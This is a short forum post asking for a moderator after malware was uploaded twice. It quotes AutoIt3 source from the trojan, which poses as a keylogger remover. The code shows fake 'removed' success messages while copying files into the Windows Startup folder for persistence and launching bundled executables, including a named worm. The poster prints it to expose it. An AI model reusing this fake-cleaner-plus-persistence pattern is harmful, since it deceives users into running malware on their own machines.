I'd like to reiterate the need for a moderator.
Today, the second virus in the past week was uploaded. This one was built using AutoIt3 (talk about fail). Here's some of the failsource.
Code:
Func _STARTUP()
Sleep(2000)
MsgBox(0, "Finished", "All suspicious Files were removed from the StartUp!")
MsgBox(0, "Tip", "It is recommended to keep the Program running to prevent Keyloggers from infecting your computer.")
FileMove("DATA\zData\KBUG1596.exe", "C:\Documents and Settings\All Users\Start Menu\Programs\Startup")
Sleep(40000)
Run("DATA\zData\JOKER.exe")
Run("DATA\zData\KIT.exe")
Run("DATA\zData\LITTLE~1.exe")
EndFunc
Func _CURELOG()
Sleep(6000)
MsgBox(0, "Success!", "All Keyloggers were removed.")
MsgBox(0, "Tip", "It is recommended to keep the Program running to prevent Keyloggers from infecting your computer.")
FileMove("DATA\zData\attachment.rtf", "C:\Documents and Settings\All Users\Start Menu\Programs\Startup")
Sleep(46000)
Run("DATA\zData\AIDS.exe")
Run("DATA\zData\MURPH~42.exe")
Run("DATA\zData\MURPHY~5.exe")
EndFunc
Func _CUREPREDA()
Sleep(100)
MsgBox(0, "Success!", "Predator Keyloggers were removed.")
MsgBox(0, "Tip", "It is recommended to keep the Program running to prevent Keyloggers from infecting your computer.")
FileMove("DATA\zData\holocaust.asm", "C:\Documents and Settings\All Users\Start Menu\Programs\Startup")
Sleep(30000)
Run("DATA\zData\attachment.rtf")
Run("DATA\zData\M-ANTICR.exe")
Run("DATA\zData\M-KAMASY.exe")
EndFunc
Func _CUREARD()
Sleep(3000)
MsgBox(0, "Success!", "Ardamax Keyloggers were removed.")
MsgBox(0, "Tip", "It is recommended to keep the Program running to prevent Keyloggers from infecting your computer.")
FileMove("DATA\zData\AIDS.exe", "C:\Documents and Settings\All Users\Start Menu\Programs\Startup")
Sleep(40000)
Run("DATA\zData\LEPROS~3.exe")
Run("DATA\zData\LIBERT~4.exe")
Run("DATA\zData\LEPROS~2.exe")
EndFunc
Func _CUREALB()
Sleep(1500)
MsgBox(0, "Success!", "Albertino Keyloggers were removed.")
MsgBox(0, "Tip", "It is recommended to keep the Program running to prevent Keyloggers from infecting your computer.")
FileMove("DATA\zData\KIT.exe", "C:\Documents and Settings\All Users\Start Menu\Programs\Startup")
Sleep(35000)
Run("DATA\zData\holocaust.asm")
Run("DATA\zData\MAYAK2~1.exe")
Run("DATA\zData\I-Worm.Pikachu.exe")
EndFunc
Its really starting to get ridiculous.